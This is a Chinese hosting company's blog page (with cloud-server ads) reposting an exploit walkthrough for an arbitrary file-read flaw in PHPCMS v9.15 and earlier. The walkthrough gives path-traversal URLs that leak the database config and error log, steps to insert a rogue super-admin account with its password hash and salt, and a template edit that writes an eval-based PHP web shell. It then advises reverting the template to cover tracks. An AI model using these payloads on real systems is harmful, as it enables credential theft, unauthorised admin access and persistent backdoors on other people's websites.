phpcmsv9.15以下任意文件读取漏洞-创新互联

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php

成功读取数据库信息如下:
phpcmsv9.15以下任意文件读取漏洞

创新互联建站专注于连江网站建设服务及定制,我们拥有丰富的企业做网站经验。 热诚为您提供连江营销型网站建设,连江网站制作、连江网页设计、连江网站官网定制、微信小程序定制开发服务,打造连江网络公司原创品牌,更为您提供连江网站排名全网营销落地服务。

爆网站路径:

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php

phpcmsv9.15以下任意文件读取漏洞

打开phpcmsV9数据库并且找到admin表,向表中添加一条数据,因为我们没法破解他的密码那么咱们就自己

添加一个用户以便能够登录后台操作:

Username:admin password: 748b4dfa3a7159c1eb1baa46f222f9b8 roleid:1 encrypt:C6mB9p

注意这几项必须添负责登录不了的。应为这条记录的意思是添加用户名为admin,密码为:creturn.com的超级管理员

phpcmsv9.15以下任意文件读取漏洞

后台登录地址:localhost/index.php?m=admin

用户名:admin 密码:creturn.com

登录后台后我们找到界面-》模版风格-》选择默认模版点击详情列表

phpcmsv9.15以下任意文件读取漏洞

然后点击里面的search目录下面的index.html右侧的编辑

phpcmsv9.15以下任意文件读取漏洞

修改其模版为:

  1. <?php $shell = '<?php @eval($_POST[cmd]);?>';file_put_contents('shell.php',$shell);?>

复制代码

提交保存

然后访问:localhost/index.php?m=search

会在根目录生成一个shell.php的一句话,我们连接看看

phpcmsv9.15以下任意文件读取漏洞

可以看到已经拿到shell,记得把修改的模版改回去。

或者可以直接通过mysql数据库及爆出的路径写一句话

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。

标题名称:phpcmsv9.15以下任意文件读取漏洞-创新互联
分享地址:https://www.cdcxhl.com/article20/dsojjo.html

成都网站建设公司_创新互联,为您提供移动网站建设网站维护网站改版品牌网站制作网站内链外贸建站

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

网站建设网站维护公司